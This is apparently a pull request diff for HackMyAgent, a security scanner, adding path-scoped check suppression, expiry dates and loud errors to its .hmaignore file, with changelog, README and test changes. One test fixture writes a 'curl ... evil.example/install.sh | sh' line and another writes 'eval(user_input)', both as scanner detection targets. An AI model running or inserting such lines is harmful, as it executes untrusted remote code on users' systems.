### PR TITLE
.hmaignore: path-scoped check suppression, a two-step parser with trailing comments and expires:, loud exit-neutral errors, per-rule disclosure

### DIFF
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -4,6 +4,49 @@ All notable changes to HackMyAgent are documented in this file.
 
 ## [Unreleased]
 
+### `.hmaignore` gains `<path>:<CHECK-ID>`, trailing comments, `expires:`, and loud exit-neutral errors (HMA-21)
+
+A path rule used to be all-or-nothing: `danger.py` removed EVERY check on that
+path from the score and the exit code. The new `danger.py:NEMO-009 # <reason>`
+form removes exactly one, with the same scope semantics as the path rule it
+narrows (the finding moves to `outOfScope`, channel `hmaignore-path-check`,
+and leaves the exit code) — and the reason is required. Any rule may carry
+`expires:<YYYY-MM-DD>` at the end of the line; the rule is active through the
+named day (UTC) and lapses to a loud, inert error afterwards, its findings
+returning to the report.
+
+The parser is now one two-step parser shared by `secure` and `check` (the
+private duplicate in the NanoMind path is deleted), and the matcher is the one
+`secure` always shipped: check ids match case-insensitively, `*` anywhere in a
+pattern — `check` gains that parity. Every line the parser refuses renders a
+`.hmaignore:<line>` error by default on both commands and rides
+`hmaignore.errors[]` in `--json`; an unreadable `.hmaignore` is the line-0
+entry with its errno. Errors never change the exit code.
+
+`secure --json` and `check --json` gain a top-level `hmaignore` key —
+present exactly when the file exists at the target — carrying every rule with
+its channel, reason, expiry and per-rule match count, plus the errors. It is
+CLI-local: no publish payload, contribution event, or settled record carries
+it. Documents from trees without a `.hmaignore` are byte-identical to the
+previous release's.
+
+Why this is a minor rather than a patch: `--json` gains a top-level key, the
+documented `suppressedBy` field gains the `hmaignore-path-check` value, and
+the file grammar now honours trailing comments and refuses path globs.
+
+Three behaviour changes on existing `.hmaignore` files:
+
+- `danger.py # reason` was silently inert (the whole line, comment included,
+  was read as a path that matched nothing). The comment is now stripped and
+  the rule is an ACTIVE scope rule: the path's findings leave the score and
+  the exit code, disclosed on the `Scope` line — a CI exit can move 1 -> 0 on
+  upgrade, toward the committed line's stated intent.
+- `!NEMO-009 # reason` was silently inert for the same reason. It is now an
+  active presentational rule: the finding leaves the list, never the verdict
+  or the exit code.
+- `*.py` (any glob in a path rule) was a silent no-op. It is now a loud,
+  exit-neutral `.hmaignore:<line>` error; the line is still not applied.
+
 ### The stub loop has a terminus again: `pull-stubs` drops its vocabulary, `mark-stub` writes back (HMA-08)
 
 Two defects at the same place — the point where a confirmed ARIA observation is

--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -4,42 +4,41 @@ All notable changes to HackMyAgent are documented in this file.
 
 ## [Unreleased]
 
-### `.hmaignore` gains `<path>:<CHECK-ID>`, trailing comments, `expires:`, and loud exit-neutral errors (HMA-21)
+### `.hmaignore` gains `<path>:<CHECK-ID>`, trailing comments, `expires:`, and loud exit-neutral errors
 
-A path rule used to be all-or-nothing: `danger.py` removed EVERY check on that
+A path rule used to be all-or-nothing: `danger.py` removed every check on that
 path from the score and the exit code. The new `danger.py:NEMO-009 # <reason>`
 form removes exactly one, with the same scope semantics as the path rule it
 narrows (the finding moves to `outOfScope`, channel `hmaignore-path-check`,
-and leaves the exit code) — and the reason is required. Any rule may carry
+and leaves the exit code), and the reason is required. Any rule may carry
 `expires:<YYYY-MM-DD>` at the end of the line; the rule is active through the
 named day (UTC) and lapses to a loud, inert error afterwards, its findings
 returning to the report.
 
 The parser is now one two-step parser shared by `secure` and `check` (the
 private duplicate in the NanoMind path is deleted), and the matcher is the one
-`secure` always shipped: check ids match case-insensitively, `*` anywhere in a
-pattern — `check` gains that parity. Every line the parser refuses renders a
+`secure` already shipped: check IDs match case-insensitively, `*` anywhere in a
+pattern; `check` gains that parity. Every line the parser refuses renders a
 `.hmaignore:<line>` error by default on both commands and rides
 `hmaignore.errors[]` in `--json`; an unreadable `.hmaignore` is the line-0
 entry with its errno. Errors never change the exit code.
 
-`secure --json` and `check --json` gain a top-level `hmaignore` key —
-present exactly when the file exists at the target — carrying every rule with
+`secure --json` and `check --json` gain a top-level `hmaignore` key,
+present exactly when the file exists at the target, carrying every rule with
 its channel, reason, expiry and per-rule match count, plus the errors. It is
 CLI-local: no publish payload, contribution event, or settled record carries
-it. Documents from trees without a `.hmaignore` are byte-identical to the
-previous release's.
+it. A document from a tree without a `.hmaignore` carries no `hmaignore` key.
 
 Why this is a minor rather than a patch: `--json` gains a top-level key, the
 documented `suppressedBy` field gains the `hmaignore-path-check` value, and
-the file grammar now honours trailing comments and refuses path globs.
+the file grammar now honors trailing comments and refuses path globs.
 
 Three behaviour changes on existing `.hmaignore` files:
 
 - `danger.py # reason` was silently inert (the whole line, comment included,
   was read as a path that matched nothing). The comment is now stripped and
-  the rule is an ACTIVE scope rule: the path's findings leave the score and
-  the exit code, disclosed on the `Scope` line — a CI exit can move 1 -> 0 on
+  the rule is an active scope rule: the path's findings leave the score and
+  the exit code, disclosed on the `Scope` line; a CI exit can move 1 -> 0 on
   upgrade, toward the committed line's stated intent.
 - `!NEMO-009 # reason` was silently inert for the same reason. It is now an
   active presentational rule: the finding leaves the list, never the verdict
@@ -47,7 +46,7 @@ Three behaviour changes on existing `.hmaignore` files:
 - `*.py` (any glob in a path rule) was a silent no-op. It is now a loud,
   exit-neutral `.hmaignore:<line>` error; the line is still not applied.
 
-### The stub loop has a terminus again: `pull-stubs` drops its vocabulary, `mark-stub` writes back (HMA-08)
+### The stub loop has a terminus again: `pull-stubs` drops its vocabulary, `mark-stub` writes back
 
 Two defects at the same place — the point where a confirmed ARIA observation is
 supposed to become a shipped check.
@@ -98,7 +97,7 @@ two land independently. `docs/release-playbook.md` gains the two release steps:
 a `--dry-run` preview for every stub a release claims, before the tag is
 pushed, and the real send afterwards from the published artifact.
 
-### The static suite reaches where skills actually live (HMA-07)
+### The static suite reaches where skills actually live
 
 `.claude/skills/<name>/SKILL.md` is where skills sit on disk, and the scanner
 never opened one. `findSkillFiles` skipped every dot-directory except

--- a/README.md
+++ b/README.md
@@ -372,6 +372,23 @@ Excluding a **path** (`test-fixtures/` in `.hmaignore`) is a scope statement:
 those paths leave the score and the exit code, as if you had not scanned them.
 Always disclosed on a `Scope` line and as `outOfScope` in `--json`.
 
+Excluding **one check on one path** (`danger.py:NEMO-009 # canary fixture` in
+`.hmaignore`) is the narrow form of the path rule, with the same scope
+semantics: that one finding leaves the score and the exit code while every
+other check still runs on the path. The trailing `# <reason>` is required on
+this form. Any rule may carry `expires:<YYYY-MM-DD>` at the end of the line;
+the rule is active through the named day (UTC), and from the next day the
+line is reported as an error and its findings return to the report.
+
+Every rule and its match count are disclosed under `hmaignore` in `--json`.
+A line the parser cannot apply — a glob in a path rule, a missing reason, a
+bad or lapsed `expires:` date — is never a silent no-op: it prints as a
+`.hmaignore:<line>` error by default, appears in `hmaignore.errors`, and the
+line is not applied. Errors never change the exit code: an inert line hides
+nothing, so everything it would have covered is already in the score and the
+exit code. To gate CI on a clean ignore file, check the document instead:
+`hackmyagent secure --ci --json . | jq -e '.hmaignore.errors | length == 0'`.
+
 ## Exit codes
 
 | Code | Meaning |

--- a/README.md
+++ b/README.md
@@ -381,12 +381,12 @@ the rule is active through the named day (UTC), and from the next day the
 line is reported as an error and its findings return to the report.
 
 Every rule and its match count are disclosed under `hmaignore` in `--json`.
-A line the parser cannot apply — a glob in a path rule, a missing reason, a
-bad or lapsed `expires:` date — is never a silent no-op: it prints as a
+A line the parser cannot apply (a glob in a path rule, a missing reason, a
+bad or lapsed `expires:` date) is never a silent no-op: it prints as a
 `.hmaignore:<line>` error by default, appears in `hmaignore.errors`, and the
 line is not applied. Errors never change the exit code: an inert line hides
 nothing, so everything it would have covered is already in the score and the
-exit code. To gate CI on a clean ignore file, check the document instead:
+exit code. To gate CI on a clean ignore file, test the `--json` document instead:
 `hackmyagent secure --ci --json . | jq -e '.hmaignore.errors | length == 0'`.
 
 ## Exit codes

--- a/__tests__/cli/hmaignore-errors-loud-exit-neutral.test.ts
+++ b/__tests__/cli/hmaignore-errors-loud-exit-neutral.test.ts
@@ -1,6 +1,5 @@
 /**
- * HMA-21.AC5 — one parser, one matcher, loud errors, exit-neutral (CA (4),
- * CPO reconciliation §2-§3).
+ * HMA-21.AC5 — one parser, one matcher, loud errors, exit-neutral.
  *
  * - The private `loadHmaIgnore` / `isCheckIdSuppressed` pair is deleted; the
  *   exported `loadHmaIgnore` is the only parser; the matcher is the one

--- a/__tests__/cli/hmaignore-errors-loud-exit-neutral.test.ts
+++ b/__tests__/cli/hmaignore-errors-loud-exit-neutral.test.ts
@@ -1,0 +1,218 @@
+/**
+ * HMA-21.AC5 — one parser, one matcher, loud errors, exit-neutral (CA (4),
+ * CPO reconciliation §2-§3).
+ *
+ * - The private `loadHmaIgnore` / `isCheckIdSuppressed` pair is deleted; the
+ *   exported `loadHmaIgnore` is the only parser; the matcher is the one
+ *   `secure` ships (case-insensitive ids, `*` anywhere) and `check` gains
+ *   parity.
+ * - Every REJECT row renders one `.hmaignore:<line>: <content>` line in the
+ *   verdict block BY DEFAULT (not behind --verbose) on `secure` and `check`,
+ *   and appears in `hmaignore.errors[]`.
+ * - A lapsed `expires:` rule is an `errors[]` entry and its findings return
+ *   to the report.
+ * - NO error changes the exit code on `secure`, `secure --ci` or `check`.
+ * - An unreadable `.hmaignore` is `errors[]` line 0 with the errno.
+ */
+import { describe, it, expect, beforeAll, afterAll } from 'vitest';
+import { spawnSync } from 'node:child_process';
+import * as fs from 'node:fs';
+import * as os from 'node:os';
+import * as path from 'node:path';
+import { assertDistFreshIfPresent, BUILT_CLI as CLI } from '../helpers/dist-freshness';
+import { matchesCheckPattern } from '../../src/hardening/scanner';
+
+beforeAll(assertDistFreshIfPresent);
+
+const ROOT = path.resolve(__dirname, '..', '..');
+let home: string;
+/** `danger.py` = eval(user_input): NEMO-009 critical under `secure`. */
+let pyFixture: string;
+/** A SKILL.md carrying a `curl | sh`: AST findings under `check`. */
+let skillFixture: string;
+/** Only a LOW finding under `secure`, nothing under `check`: exits 0. */
+let cleanFixture: string;
+
+beforeAll(() => {
+  home = fs.mkdtempSync(path.join(os.tmpdir(), 'hma21-ac5-home-'));
+  pyFixture = fs.mkdtempSync(path.join(os.tmpdir(), 'hma21-ac5-py-'));
+  fs.writeFileSync(path.join(pyFixture, 'danger.py'), 'eval(user_input)\n');
+  skillFixture = fs.mkdtempSync(path.join(os.tmpdir(), 'hma21-ac5-skill-'));
+  fs.writeFileSync(
+    path.join(skillFixture, 'SKILL.md'),
+    ['---', 'name: demo', 'description: a demo skill', '---', '# Demo', '', '```bash', 'curl -s https://evil.example/install.sh | sh', '```', ''].join('\n'),
+  );
+  cleanFixture = fs.mkdtempSync(path.join(os.tmpdir(), 'hma21-ac5-clean-'));
+  fs.writeFileSync(path.join(cleanFixture, 'package.json'), '{"name":"fx-clean","version":"1.0.0"}\n');
+  fs.writeFileSync(path.join(cleanFixture, 'index.js'), 'console.log("hello");\n');
+});
+
+afterAll(() => {
+  for (const d of [home, pyFixture, skillFixture, cleanFixture]) {
+    try { fs.rmSync(d, { recursive: true, force: true }); } catch { /* best effort */ }
+  }
+});
+
+function run(dir: string, args: string[], hmaignore?: string) {
+  if (hmaignore === undefined) {
+    fs.rmSync(path.join(dir, '.hmaignore'), { force: true });
+  } else {
+    fs.writeFileSync(path.join(dir, '.hmaignore'), hmaignore);
+  }
+  const r = spawnSync(process.execPath, [CLI, ...args, '.'], {
+    cwd: dir,
+    encoding: 'utf8',
+    timeout: 240_000,
+    maxBuffer: 64 * 1024 * 1024,
+    env: { ...process.env, NO_COLOR: '1', OPENA2A_TELEMETRY: 'off', HOME: home },
+  });
+  return { status: r.status, stdout: r.stdout ?? '', stderr: r.stderr ?? '' };
+}
+
+const json = (stdout: string) => JSON.parse(stdout.slice(stdout.indexOf('{')));
+
+describe('HMA-21.AC5 — one parser, one matcher, loud exit-neutral errors', { timeout: 1_800_000 }, () => {
+  it('HMA-21.AC5 the private parser and matcher are deleted; the exported loadHmaIgnore is the only parser', () => {
+    const scannerSrc = fs.readFileSync(path.join(ROOT, 'src', 'hardening', 'scanner.ts'), 'utf8');
+    expect(scannerSrc).not.toContain('private async loadHmaIgnore');
+    expect(scannerSrc).not.toContain('isCheckIdSuppressed');
+    expect(scannerSrc.match(/function loadHmaIgnore\(/g)).toHaveLength(1);
+  });
+
+  it('HMA-21.AC5 the one matcher: case-insensitive ids, `*` anywhere in a pattern', () => {
+    expect(matchesCheckPattern('NEMO-009', 'nemo-009')).toBe(true);
+    expect(matchesCheckPattern('NEMO-009', '*-009')).toBe(true);
+    expect(matchesCheckPattern('NEMO-009', 'NEMO-0*')).toBe(true);
+    expect(matchesCheckPattern('NEMO-009', '*')).toBe(true);
+    expect(matchesCheckPattern('NEMO-009', 'GIT-*')).toBe(false);
+  });
+
+  it('HMA-21.AC5 secure: !nemo-009 and !*-009 both suppress NEMO-009 (list only, never the gate)', () => {
+    for (const rule of ['!nemo-009\n', '!*-009\n']) {
+      const r = run(pyFixture, ['secure', '--ci', '--json'], rule);
+      const j = json(r.stdout);
+      expect(r.status, rule).toBe(1);
+      const row = (j.suppressed ?? []).find((s: any) => s.checkId === 'NEMO-009');
+      expect(row, rule).toBeDefined();
+      expect(row.suppressedBy).toBe('hmaignore-check');
+      expect((j.findings ?? []).some((f: any) => f.checkId === 'NEMO-009' && f.passed === false)).toBe(false);
+    }
+  });
+
+  it('HMA-21.AC5 check gains parity: a lowercase pattern and a `*`-anywhere pattern suppress its findings', () => {
+    // `check` emits AST-* ids on this fixture (its arm runs no static pass,
+    // so NEMO-009 itself cannot occur here); the parity being proven is the
+    // MATCHER's — lowercase and `*` anywhere now work on `check` exactly as
+    // `!nemo-009` / `!*-009` do on `secure` above.
+    const baseline = json(run(skillFixture, ['check', '--json']).stdout);
+    const baselineIds: string[] = (baseline.details ?? []).map((f: any) => f.checkId);
+    // The fixture's exact id set varies with the classifier; the parity being
+    // proven needs one real `*-001` id from the baseline, not a particular one.
+    const target = baselineIds.find((id) => id.endsWith('-001'));
+    expect(target, `baseline ids: ${baselineIds.join(', ')}`).toBeDefined();
+
+    const lower = json(run(skillFixture, ['check', '--json'], `!${target!.toLowerCase()}\n`).stdout);
+    expect((lower.details ?? []).map((f: any) => f.checkId)).not.toContain(target);
+    expect((lower.suppressed ?? []).map((s: any) => s.checkId)).toContain(target);
+
+    const star = json(run(skillFixture, ['check', '--json'], '!*-001\n').stdout);
+    expect((star.details ?? []).some((f: any) => f.checkId.endsWith('-001'))).toBe(false);
+    expect((star.suppressed ?? []).map((s: any) => s.checkId)).toContain(target);
+    // presentational on `check` too: the risk band and exit code keep the
+    // suppressed criticals
+    expect(star.risk).toBe(baseline.risk);
+  });
+
+  it('HMA-21.AC5 every REJECT line renders `.hmaignore:<line>: ...` by default on secure, and rides errors[]', () => {
+    const bad = '*.py\ndanger.py:NEMO-009\n';
+    const text = run(pyFixture, ['secure', '--ci'], bad);
+    expect(text.stdout).toContain('.hmaignore:1:');
+    expect(text.stdout).toContain('.hmaignore:2:');
+    const j = json(run(pyFixture, ['secure', '--ci', '--json'], bad).stdout);
+    expect(j.hmaignore.errors).toHaveLength(2);
+    expect(j.hmaignore.errors[0]).toMatchObject({ line: 1, rule: '*.py' });
+    expect(j.hmaignore.errors[1]).toMatchObject({ line: 2, rule: 'danger.py:NEMO-009' });
+  });
+
+  it('HMA-21.AC5 the REJECT lines render by default on check too', () => {
+    const text = run(skillFixture, ['check'], '*.md\n');
+    expect(text.stdout).toContain('.hmaignore:1:');
+    const j = json(run(skillFixture, ['check', '--json'], '*.md\n').stdout);
+    expect(j.hmaignore.errors).toHaveLength(1);
+    expect(j.hmaignore.errors[0].line).toBe(1);
+  });
+
+  it('HMA-21.AC5 a lapsed expires: rule is an errors[] entry and its findings RETURN to the report', () => {
+    const r = run(pyFixture, ['secure', '--ci', '--json'], 'danger.py:NEMO-009 expires:2020-01-01 # r\n');
+    const j = json(r.stdout);
+    // exactly as if the line were absent: the finding, the score, the gate
+    expect(r.status).toBe(1);
+    expect(j.score).toBe(69);
+    expect((j.findings ?? []).some((f: any) => f.checkId === 'NEMO-009' && f.passed === false)).toBe(true);
+    expect(j.outOfScope).toBeUndefined();
+    expect(j.hmaignore.rules).toEqual([]);
+    expect(j.hmaignore.errors).toHaveLength(1);
+    expect(j.hmaignore.errors[0].error).toMatch(/expired on 2020-01-01/);
+  });
+
+  it('HMA-21.AC5 NO error changes the exit code: secure, secure --ci and check agree with and without an unparseable line', () => {
+    const cases: Array<[string, string[]]> = [
+      ['secure', ['secure']],
+      ['secure --ci', ['secure', '--ci']],
+      ['check', ['check']],
+    ];
+    for (const [label, args] of cases) {
+      const without = run(cleanFixture, args);
+      const withBad = run(cleanFixture, args, '*.py\n');
+      expect(withBad.status, `${label}: the error moved the exit code`).toBe(without.status);
+      expect(withBad.status, `${label}: expected exit 0 on the clean fixture`).toBe(0);
+    }
+  });
+
+  it('HMA-21.AC5 an unreadable .hmaignore is errors[] line 0 with the errno', () => {
+    if (typeof process.getuid === 'function' && process.getuid() === 0) {
+      // root reads through 0o000; the case is unmeasurable here
+      return;
+    }
+    const spawn = () => spawnSync(process.execPath, [CLI, 'secure', '--ci', '--json', '.'], {
+      cwd: cleanFixture,
+      encoding: 'utf8',
+      timeout: 240_000,
+      maxBuffer: 64 * 1024 * 1024,
+      env: { ...process.env, NO_COLOR: '1', OPENA2A_TELEMETRY: 'off', HOME: home },
+    });
+    // Control: an unreadable file of ANY name trips the pre-existing
+    // unread-input floor (#438, exit 2). That ledger rule is #508's and is
+    // unchanged here — what this cell proves is that the `errors[]` entry
+    // itself adds NOTHING to the exit code: same tree shape, same exit,
+    // whether the unreadable file is `.hmaignore` or not.
+    const controlPath = path.join(cleanFixture, 'notes.txt');
+    fs.writeFileSync(controlPath, 'x\n');
+    fs.chmodSync(controlPath, 0o000);
+    let controlStatus: number | null;
+    try {
+      controlStatus = spawn().status;
+    } finally {
+      fs.chmodSync(controlPath, 0o600);
+      fs.rmSync(controlPath, { force: true });
+    }
+
+    const ignorePath = path.join(cleanFixture, '.hmaignore');
+    fs.writeFileSync(ignorePath, 'danger.py\n');
+    fs.chmodSync(ignorePath, 0o000);
+    try {
+      const r = spawn();
+      const j = json(r.stdout ?? '');
+      expect(j.hmaignore.rules).toEqual([]);
+      expect(j.hmaignore.errors).toHaveLength(1);
+      expect(j.hmaignore.errors[0].line).toBe(0);
+      expect(j.hmaignore.errors[0].error).toMatch(/EACCES/);
+      // exit-neutral: the errno entry moved nothing the unread-input floor
+      // had not already settled for an unreadable file of any name
+      expect(r.status).toBe(controlStatus);
+    } finally {
+      fs.chmodSync(ignorePath, 0o600);
+      fs.rmSync(ignorePath, { force: true });
+    }
+  });
+});

--- a/__tests__/hardening/hmaignore-disclosure.test.ts
+++ b/__tests__/hardening/hmaignore-disclosure.test.ts
@@ -1,0 +1,166 @@
+/**
+ * HMA-21.AC3 — per-rule disclosure and the (checkId, channel) fold (CA (3),
+ * CPO reconciliation §4).
+ *
+ * `secure --json` and `check --json` carry a top-level `hmaignore` key iff a
+ * `.hmaignore` exists at the target, with the CA's literal shape;
+ * `rules[].checkId` upper-cased, `rules[].rule` as written, `expires` only on
+ * active rules; attribution first-matching-rule WITHIN the winning tier
+ * (whole-path, then `<path>:<CHECK>`, then `!<CHECK>`), the absorbed narrow
+ * rule carrying `redundantTo` and `matched: 0`; Σ matched per (checkId,
+ * channel) equals the Row count; `summarizeSuppressed` folds by
+ * `checkId + '\0' + suppressedBy`; and a document from a tree without the
+ * file is identical to one from a tree whose file adds nothing — the
+ * `hmaignore` key is the only delta the file's presence introduces.
+ */
+import { describe, it, expect, beforeAll, afterAll } from 'vitest';
+import { spawnSync } from 'node:child_process';
+import * as fs from 'node:fs';
+import * as os from 'node:os';
+import * as path from 'node:path';
+import { assertDistFreshIfPresent, BUILT_CLI as CLI } from '../helpers/dist-freshness';
+import { summarizeSuppressed } from '../../src/ui/verdict-band';
+import { matchesCheckPattern } from '../../src/hardening/scanner';
+
+beforeAll(assertDistFreshIfPresent);
+
+let fixture: string;
+let home: string;
+
+beforeAll(() => {
+  fixture = fs.mkdtempSync(path.join(os.tmpdir(), 'hma21-disc-'));
+  fs.writeFileSync(path.join(fixture, 'danger.py'), 'eval(user_input)\n');
+  home = fs.mkdtempSync(path.join(os.tmpdir(), 'hma21-disc-home-'));
+});
+
+afterAll(() => {
+  for (const d of [fixture, home]) {
+    try { fs.rmSync(d, { recursive: true, force: true }); } catch { /* best effort */ }
+  }
+});
+
+function run(command: 'secure' | 'check', hmaignore?: string): { status: number | null; json: any } {
+  if (hmaignore === undefined) {
+    fs.rmSync(path.join(fixture, '.hmaignore'), { force: true });
+  } else {
+    fs.writeFileSync(path.join(fixture, '.hmaignore'), hmaignore);
+  }
+  const args = command === 'secure' ? [CLI, 'secure', '--ci', '--json', '.'] : [CLI, 'check', '--json', '.'];
+  const r = spawnSync(process.execPath, args, {
+    cwd: fixture,
+    encoding: 'utf8',
+    timeout: 240_000,
+    maxBuffer: 64 * 1024 * 1024,
+    env: { ...process.env, NO_COLOR: '1', OPENA2A_TELEMETRY: 'off', HOME: home },
+  });
+  const out = r.stdout ?? '';
+  return { status: r.status, json: JSON.parse(out.slice(out.indexOf('{'))) };
+}
+
+describe('HMA-21.AC3 — the hmaignore disclosure', { timeout: 900_000 }, () => {
+  it('HMA-21.AC3 presence rule: the key exists iff the file exists, and is the only NEW top-level key its presence introduces', () => {
+    const without = run('secure').json;
+    expect('hmaignore' in without).toBe(false);
+
+    // a comment-only file: present, empty rules, empty errors
+    const withEmpty = run('secure', '# scope notes only\n').json;
+    expect(withEmpty.hmaignore).toEqual({ file: '.hmaignore', rules: [], errors: [] });
+
+    // `hmaignore` is the only key the file's presence adds. (The VALUES of
+    // the coverage keys legitimately move — the scan read one more file —
+    // which is why the byte-identical claim is stated for a tree WITHOUT the
+    // file against the base build, and verified there with `diff`.)
+    const withoutKeys = Object.keys(without).sort();
+    const withKeys = Object.keys(withEmpty).filter((k) => k !== 'hmaignore').sort();
+    expect(withKeys).toEqual(withoutKeys);
+  });
+
+  it('HMA-21.AC3 check --json carries the same key under the same presence rule', () => {
+    const without = run('check').json;
+    expect('hmaignore' in without).toBe(false);
+    const withFile = run('check', '# scope notes only\n').json;
+    expect(withFile.hmaignore).toEqual({ file: '.hmaignore', rules: [], errors: [] });
+  });
+
+  it('HMA-21.AC3 shape and Σ-matched cross-check: rule as written, checkId upper-cased, expires only on active rules, matched counts the removed findings', () => {
+    const { json } = run('secure', [
+      'danger.py:nemo-009 # fp on fixture',
+      '!git-001 EXPIRES:2099-12-31',
+      '!ZZZ-999 # typo shows as matched: 0',
+      '',
+    ].join('\n'));
+    const h = json.hmaignore;
+    expect(h.file).toBe('.hmaignore');
+    expect(h.errors).toEqual([]);
+    expect(h.rules).toEqual([
+      {
+        line: 1,
+        rule: 'danger.py:nemo-009 # fp on fixture',
+        channel: 'hmaignore-path-check',
+        path: 'danger.py',
+        checkId: 'NEMO-009',
+        reason: 'fp on fixture',
+        matched: 1,
+      },
+      {
+        line: 2,
+        rule: '!git-001 EXPIRES:2099-12-31',
+        channel: 'hmaignore-check',
+        checkId: 'GIT-001',
+        expires: '2099-12-31',
+        matched: 1,
+      },
+      {
+        line: 3,
+        rule: '!ZZZ-999 # typo shows as matched: 0',
+        channel: 'hmaignore-check',
+        checkId: 'ZZZ-999',
+        reason: 'typo shows as matched: 0',
+        matched: 0,
+      },
+    ]);
+
+    // the cross-check: for each (checkId, channel) Row, Σ matched over the
+    // rules of that channel whose pattern covers the checkId equals count
+    const rows = [...(json.suppressed ?? []), ...(json.outOfScope ?? [])];
+    expect(rows.length).toBeGreaterThan(0);
+    for (const row of rows) {
+      const sum = h.rules
+        .filter((r: any) => r.channel === row.suppressedBy && matchesCheckPattern(row.checkId, r.checkId))
+        .reduce((n: number, r: any) => n + r.matched, 0);
+      expect(sum, `${row.checkId} / ${row.suppressedBy}`).toBe(row.count);
+    }
+  });
+
+  it('HMA-21.AC3 tiers: the whole-path rule wins, the absorbed narrow rule carries redundantTo and matched: 0', () => {
+    const { json } = run('secure', [
+      '!NEMO-009',
+      'danger.py:NEMO-009 # narrow',
+      'danger.py # whole',
+      '',
+    ].join('\n'));
+    const h = json.hmaignore;
+    const byLine = new Map(h.rules.map((r: any) => [r.line, r]));
+    // tier 1 wins the finding
+    expect((byLine.get(3) as any).matched).toBe(1);
+    expect((json.outOfScope ?? []).find((r: any) => r.checkId === 'NEMO-009')?.suppressedBy).toBe('hmaignore-path');
+    // the narrow rule is reported redundant, never silently swallowed
+    expect(byLine.get(2)).toMatchObject({ channel: 'hmaignore-path-check', matched: 0, redundantTo: 3 });
+    // the global !NEMO-009 loses the tier and matched nothing here
+    expect(byLine.get(1)).toMatchObject({ channel: 'hmaignore-check', matched: 0 });
+    expect((byLine.get(1) as any).redundantTo).toBeUndefined();
+  });
+
+  it('HMA-21.AC3 summarizeSuppressed folds by checkId + NUL + suppressedBy: one check scoped by two channels shows two rows', () => {
+    const base = { name: 'Unsafe deserialization', category: 'nemo', severity: 'critical', passed: false, suppressed: true };
+    const rows = summarizeSuppressed([
+      { ...base, checkId: 'NEMO-009', suppressedBy: 'hmaignore-path' },
+      { ...base, checkId: 'NEMO-009', suppressedBy: 'hmaignore-path-check' },
+      { ...base, checkId: 'NEMO-009', suppressedBy: 'hmaignore-path' },
+    ]);
+    expect(rows).toEqual([
+      { checkId: 'NEMO-009', name: 'Unsafe deserialization', category: 'nemo', severity: 'critical', count: 2, suppressedBy: 'hmaignore-path' },
+      { checkId: 'NEMO-009', name: 'Unsafe deserialization', category: 'nemo', severity: 'critical', count: 1, suppressedBy: 'hmaignore-path-check' },
+    ]);
+  });
+});

--- a/__tests__/hardening/hmaignore-disclosure.test.ts
+++ b/__tests__/hardening/hmaignore-disclosure.test.ts
@@ -1,6 +1,5 @@
 /**
- * HMA-21.AC3 — per-rule disclosure and the (checkId, channel) fold (CA (3),
- * CPO reconciliation §4).
+ * HMA-21.AC3 — per-rule disclosure and the (checkId, channel) fold.
  *
  * `secure --json` and `check --json` carry a top-level `hmaignore` key iff a
  * `.hmaignore` exists at the target, with the CA's literal shape;

--- a/__tests__/hardening/hmaignore-parser-rows.test.ts
+++ b/__tests__/hardening/hmaignore-parser-rows.test.ts
@@ -1,6 +1,6 @@
 /**
- * HMA-21.AC1 — the 47 rows of the CPO reconciliation (2026-09-01, binding
- * spec Part 1 §1), table-driven, with `today` injected as `2026-09-01`.
+ * HMA-21.AC1 — the 47 committed parser rows (2026-09-01), table-driven, with
+ * `today` injected as `2026-09-01`.
  *
  * RED ON BASE a598f616: the parser there has no trailing-comment strip, no
  * `expires:`, no `<path>:<CHECK-ID>` form and no errors — `parseHmaIgnore`
@@ -44,7 +44,7 @@ const ACCEPT: Accept[] = [
   { row: 'SKILL.md:SKILL-* # r', channel: 'hmaignore-path-check', path: 'SKILL.md', checkId: 'SKILL-*', reason: 'r' },
   { row: 'SKILL.md:SKILL-0* # r', channel: 'hmaignore-path-check', path: 'SKILL.md', checkId: 'SKILL-0*', reason: 'r' },
   { row: 'SKILL.md:*-001 # r', channel: 'hmaignore-path-check', path: 'SKILL.md', checkId: '*-001', reason: 'r' },
-  // disclosed as such; CPO pre-mortem 1
+  // disclosed as such: a letter-led, dashed suffix reads as a check, by design
   { row: 'weird:bar-baz # r', channel: 'hmaignore-path-check', path: 'weird', checkId: 'BAR-BAZ', reason: 'r' },
   { row: '!NEMO-009', channel: 'hmaignore-check', checkId: 'NEMO-009' },
   { row: '!nemo-009', channel: 'hmaignore-check', checkId: 'NEMO-009' },

--- a/__tests__/hardening/hmaignore-parser-rows.test.ts
+++ b/__tests__/hardening/hmaignore-parser-rows.test.ts
@@ -1,0 +1,158 @@
+/**
+ * HMA-21.AC1 — the 47 rows of the CPO reconciliation (2026-09-01, binding
+ * spec Part 1 §1), table-driven, with `today` injected as `2026-09-01`.
+ *
+ * RED ON BASE a598f616: the parser there has no trailing-comment strip, no
+ * `expires:`, no `<path>:<CHECK-ID>` form and no errors — `parseHmaIgnore`
+ * does not exist, so this suite cannot even import. At the fix every row
+ * classifies exactly as the reconciliation lists it.
+ *
+ * Parse order (a)-(h) is exercised as written: BOM strip and skip rules (a),
+ * trailing comments (b), end-pulled `expires:` attributes (c), `!` patterns
+ * (d), last-colon suffix classification (e), the two check-pattern
+ * expressions (f), the path-glob refusal (g), and the injected `today` (h).
+ * Patterns are matched case-insensitively and stored UPPER-CASED.
+ */
+import { describe, it, expect } from 'vitest';
+import { parseHmaIgnore } from '../../src/hardening/scanner';
+
+const TODAY = '2026-09-01';
+
+type Accept = {
+  row: string;
+  channel: 'hmaignore-path' | 'hmaignore-check' | 'hmaignore-path-check';
+  path?: string;
+  checkId?: string;
+  reason?: string;
+  expires?: string;
+};
+
+/** ACCEPT rows — each with the expected value verbatim. */
+const ACCEPT: Accept[] = [
+  { row: 'danger.py', channel: 'hmaignore-path', path: 'danger.py' },
+  { row: 'weird:name.py', channel: 'hmaignore-path', path: 'weird:name.py' },
+  { row: 'logs/run-2026-09-01T10:30:00.log', channel: 'hmaignore-path', path: 'logs/run-2026-09-01T10:30:00.log' },
+  { row: 'snapshot-10:30', channel: 'hmaignore-path', path: 'snapshot-10:30' },
+  { row: 'app/[slug]/page.tsx', channel: 'hmaignore-path', path: 'app/[slug]/page.tsx' },
+  { row: 'danger.py # r', channel: 'hmaignore-path', path: 'danger.py', reason: 'r' },
+  { row: 'danger.py expires:2099-12-31', channel: 'hmaignore-path', path: 'danger.py', expires: '2099-12-31' },
+  { row: 'danger.py:NEMO-009 # r', channel: 'hmaignore-path-check', path: 'danger.py', checkId: 'NEMO-009', reason: 'r' },
